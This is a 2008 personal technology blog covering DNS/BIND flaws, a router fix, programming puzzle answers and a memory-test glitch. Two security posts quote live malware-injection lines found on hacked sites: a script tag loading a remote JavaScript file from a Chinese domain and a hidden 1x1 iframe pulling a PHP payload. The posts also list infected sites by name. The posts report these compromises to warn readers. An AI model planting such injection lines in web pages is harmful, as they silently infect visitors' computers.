Comet Blog

Comet Blog

Ramblings of Comet--Berkeley Blog Feed

Internet Design Vulnerability - DNS and BIND (permalink):

Tuesday, August 26, 2008 11:20:00 AM PDT

The internet was originally designed by military scientists to be invulnerable to physical attacks on centralized switching/routing facilities.

So the internet does not rely on a centralized routing system but instead relies on a distributed routing system.

http://www.freesoft.org/CIE/Topics/57.htm

Where were the issues of identification, authorization, etc that are so vital to business accounting covered?

These business/security issues were never in the original design...

DNS and BIND

DNS, domain name resolution, is a critical piece of the internet. It is the process by which a domain name such as "google.com" is turned into a number such as 64.233.167.99

It is something that everyone's web browser does silently every time a web link is accessed and most people don't pay much attention to it.

Every time you ask your web browser for a page it goes out to the internet, typically to a server called "BIND" that is provided by your ISP, internet service provider. BIND takes the domain name that the web browser provides and returns back an ip address. It takes google.com and returns 64.233.167.99

D. J. Bernstein hated the internet standard BIND program for DNS resolution so much that the decided to write his own DNS resolver, djbdns:

http://cr.yp.to/djbdns.html

I was curious about why he re-wrote BIND and had no particular opinion about it until I saw the recent debacle with DNS BIND caching this July:

http://www.schneier.com/blog/archives/2008/07/the_dns_vulnera.html

And the fix announced at the August Defcon and then the unfix reported by a Russian hacker in the New York Times:

http://www.nytimes.com/2008/08/09/technology/09flaw.html?_r=1&hp&oref=slogin

Bind has lots of problems and they are not just programming problems but basic design problems.

To quote the NY Times article, "The root of the problem lies in the fact that the address system, which was invented in 1983, was not meant for services like electronic banking that require strict verification of identity."

djbdns is a step in the right direction but it is not enough as the current DNS system is flawed from the beginning and will always be vulnerable to forgery.

As D. J. Bernstein says in his article on DNS Forgery, "An attacker with access to your network can easily forge responses to your computer's DNS requests."

http://cr.yp.to/djbdns/forgery.html

He suggests using public key cryptography and maybe that is the best solution for now.

Of course the ideal solution is to not do banking/accounting/etc at all on a public networks, but only on private networks.

Tomato eth%d: 3.90.38.0 driver failed with code 23 (permalink):

Tuesday, June 24, 2008 10:13:00 PM PDT

My Linksys WRT54G wireless router stopped transmitting/receiving and I could not figure it out.

I tried resetting the wlan connection, rebooting the router and finally unplugging/plugging the power connection.

None of this worked to make the "wireless" part of the router work again.

There was a system log message showing that the eth1 interface was not working though:

eth%d: 3.90.38.0 driver failed with code 23

After doing some web research on OpenWRT I was finally able to fix the problem.

I ssh-ed into the router and issued this command:

insmod wl

And the system log immediately showed this:

eth1: Broadcom BCM4320 802.11 Wireless Controller

Yet More Green Zone Hacking (permalink):

Sunday, June 01, 2008 02:30:00 PM PDT

The dota11.cn problem mentioned in my Wednesday/Thursday blog is getting worse.

When I do this Google search for the hackers script insertion, I now find over 280,000 hits whereas on Thursday I was finding only around 210,000.

Clearly this problem is growing.
As a precaution, I recommended several things in my last blog.

Use Firefox with the Noscript addon.
Use Linux

Using an Apple computer is not a bad idea either, but there is really no inherent safety in using Linux or an Apple computer except that the hackers go for Windows machines because they are the most popular.

The root cause of these kinds of problems is that we allow almost any web site to run code on our home machines.
In a professional business computing environment this should never be allowed.

But somehow it has become "acceptable" for home users. So the safest thing for home users is to never do "business" on their home computers. Never do online banking or commerce.

The Internet never was designed for business/security and it's best uses are probably educational, entertainment and socializing.

More Hacked in the Green Zone (permalink):

Thursday, May 29, 2008 09:52:00 AM PDT

May 28, 8:47 AM PDT (GMT-7)
So called "trusted" web sites are no longer trustworthy as I reported in my earlier blog:
Hacked in the Green Zone

The good news is that the San Francisco Chronicle reported on this on May 6, 2008:
Internet criminals gaining ground, experts say

The bad news is that I found a new problem. And I did not see that anyone else has picked up on the problem.

Here is what I found. On the morning of Tuesday May 27, 2008 the StarIQ.com Daily Horoscope was hacked. Embedded inside of the description for each sign of the zodiac was a tag like this:

<script src=http://www.dota11.cn/m.js></script>

So if a Windows computer user clicked on his sign, then he would download some spambot, virus or who knows what from several web sites registered in China.

Essentially, the home computer is compromised and the hacker can do anything he likes with the machine.

Is StarIQ.com the only web site to have this problem?

Heck no. Doing a google search comes up with over 200,000 hits.
Thousands of these websites are still infected!

Examples: (Don't go to these websites unless you are protected!)
www.morrellwinebar.com
www.bioimmune.com
www.americancapitalrealty.net

How did this happen? I would like to know. Somehow hackers are compromising thousands of web sites like StarIQ.com and changing their web pages.

What can the average home computer user do? Use the Firefox web browser with the NoScript add-on.

Another option is to just not use Windows, use Linux.

Update May 29 9:53 AM PDT

I reported the problem to Google.com and they flagged dota11.cn as a "bad" website. So if you do a Google search and try to click on an infected website, then a warning page appears first.

The "cause" of the infection appears to be by SQL injection into the Microsoft SQL server by use of custom variables to a web form input, the same old web cgi, client-server problems that have been around for decades.

Here is a technical description of the problem:

www.0x000000.com

TeX4ht for Slackware (permalink):

Wednesday, May 21, 2008 10:10:00 AM PDT

I installed the build system for OpenWRT and wanted to create the html from the LaTeX documents, but my standard Slackware release 12.0 did not have the "htlatex" command.

Doing a Google, I found "htlatex" as part of TeX4ht at:

www.cse.ohio-state.edu/~gurari/TeX4ht/

There is an old Slackware 10 version of TeX4ht at LinuxPackages but I could not get it to work.

So I downloaded the source from the Ohio State site and created my own Slackware 12.0 package for download:

tex4ht-2.0

The package might work on Zenwalk too because it is based on Slackware.

System Outage (permalink):

Thursday, May 15, 2008 09:11:00 PM PDT
This evening my DSL modem, a Speedstream 4100, stopped working and it took me several hours to get the web server back online. Fortunately I had a spare modem and was able to get the system back up fairly quickly. Otherwise it might have taken me a day or more...

Bram's BitTorrent Challenge (permalink):

Wednesday, April 30, 2008 12:34:00 PM PDT

Here are my answers to some of Bram Cohen's challenge puzzles:

What is the exponent of the largest power of 2 whose base 7 representation doesn't contain three zeros in a row? Include the code you used to find the answer in your response.

There is probably no answer to this one.
What is the smallest difference between two primes whose sum is a billion?

138. The two primes are 499999931 and 500000069.

Here is my primesum.c source code that I used to figure this out.
And here is the output from running the primesum c program:
```
    $./primesum
    Find the smallest difference between two primes whose sum is 1000000000
    min prime=499999931
    max prime=500000069
  
    difference=138

    $
  
```

What is the smallest integer greater than a trillion (10 ** 12) all of whose factors end in one but is not itself prime?

1000000000231. And the prime factors are 1181 and 846740051.

To do this I used a program from Acme.com called Factor.

I modified the source code to run with larger numbers by re-declaring the longs to "long long".

And here is my version of factor.c

Then I wrote a simple Rexx script to test factors over 1 trillion that ended in 1

Here is my test3.rex Rexx script.

And just for kicks I re-wrote the Rexx script in Python and Ruby
Here is my test3.py Python script.
Here is my test3.rb Ruby script.

And here is the output from running the Rexx script:

     $rexx test3.rex
     1000000000001 = 73 137 99990001
     1000000000011 = 3 269 5107 242639
     1000000000021 = 11 17 12119 441257
     1000000000031 = 19 617 85302397
     1000000000041 = 3 7 179 266028199
     1000000000051 = 13 107 718907261
     1000000000061 = 1000000000061
     1000000000071 = 3^2 79 1406469761
     1000000000081 = 3929 254517689
     1000000000091 = 1000000000091
     1000000000101 = 3 333333333367
     1000000000111 = 7 601 1019 233267
     1000000000121 = 1000000000121
     1000000000131 = 3 11^3 587 426641
     1000000000141 = 239 4184100419
     1000000000151 = 31 43 167 911 4931
     1000000000161 = 3^3 317 827 141277
     1000000000171 = 23 199 271 806213
     1000000000181 = 7^2 13 1569858713
     1000000000191 = 3 17 19607843141
     1000000000201 = 101 197 2239 22447
     1000000000211 = 1000000000211
     1000000000221 = 3 19 37 157 3020117
     1000000000231 = 1181 846740051
     Eureka!
     $

Rewrite of the following code cleaned up to be reasonably fast.
Make this code run in a reasonable amount of time.
Give your answer in Python.

  def mystery_func1(x):
      c = 0
      while x != 1:
          p = 0
          q = 0
          while q < x:
              p += 1
              q += 2
          if q == x:
              x = p
          else:
              p = 0
              q = 0
              while p != x:
                  p += 1
                  q += 3
              x = q + 1
          c += 1
      return c

Here is my answer:

  def mystery_func1(x):
      c = 0
      while x != 1:
          p = (x + 1) // 2
          if  x == 2 * p:
              x = p
          else:
              x = 3 * x + 1
          c += 1
      return c

Make this code run in a reasonable amount of time.

  def mystery_func3(inlist):
      for i in inlist:
          assert i in xrange(2 ** 30)
      mylist = [0]* len(inlist)
      while not mystery_func3_helper(inlist, mylist):
          pos = len(mylist) - 1
          while mylist[pos] == 2 ** 30 - 1:
              mylist[pos] = 0
              pos -= 1
          mylist[pos] += 1
      return mylist
  
  def mystery_func3_helper(list1, list2):
      for i in xrange(2 ** 30):
          c1 = 0
          for j in list1:
              if j == i:
                  c1 += 1
          c2 = 0
          for j in list2:
              if j == i:
                  c2 += 1
          if c1 != c2:
              return False
      return True

To answer, here is my replacement for mystery_func3:

  def mystery_func3(inlist):
      for i in inlist:
          assert i in xrange(2 ** 30)
      mylist = inlist[:]
      mylist.sort()
      return mylist

Hacked in the Green Zone (permalink):

Friday, April 18, 2008 11:24:00 AM PDT

Iframe attacks are becoming very common as many websites are vulnerable.

The hackers in this case are not simply attacking the PC users but attacking the web servers themselves aka the "Green Zone".

See this article by Roger Grimes on March 21.

Typically all pages at the hacked website will include code at the bottom of each page similar to this:

<iframe src="http://cdpuvbhfzz.com/dl/adv598.php"
width=1 height=1></iframe>

which translates into something like this on the users computer:

<iframe src="http://cdpuvbhfzz.com/dl/adv598.php"
width=1 height=1></iframe>

When an unsuspecting user clicks on a trusted website he downloads spyware, viruses, etc as described in this article at CastleCops

memtest86+ v2.01 good 80808080 bad 80808000 (permalink):

Wednesday, April 09, 2008 12:46:00 PM PDT

I recently tested a Pentium 4 system with an Intel motherboard by running memtest86+ to check out the ram memory chips.

I kept getting the following error no matter how I swapped around the memory chips on the motherboard:

   Test #3
   Address: 00000100020 1.0MB
   Good: 80808080
   Bad: 80808000

I would try one chip and then the other. I moved the two chips around the 4 available memory slots on the motherboard, but still got the same results.

The system seemed to be very stable and so the memory test error did not make sense.

I did a search on google and found the following forum thread:

http://forum.x86-secret.com/archive/index.php?t-3670.html

And finally figured out that the error comes from plugging the mouse into a USB port instead of plugging it into the standard PS/2 port...

In fact I can "crash" memtest86+ every time just by moving the mouse when it gets to test #3.

But if the mouse is plugged into the PS/2 port, then there is no memory error and moving the mouse has no effect.

Moral of the story?

"If you take a test and fail, but everything checks out ok otherwise, then ignore the test."

or

"Stop playing around with your mouse and plug it into the right slot...."

Comet Home Page
last modified on 2023 April 8
Please send comments to: webmaster@comet.aaazen.com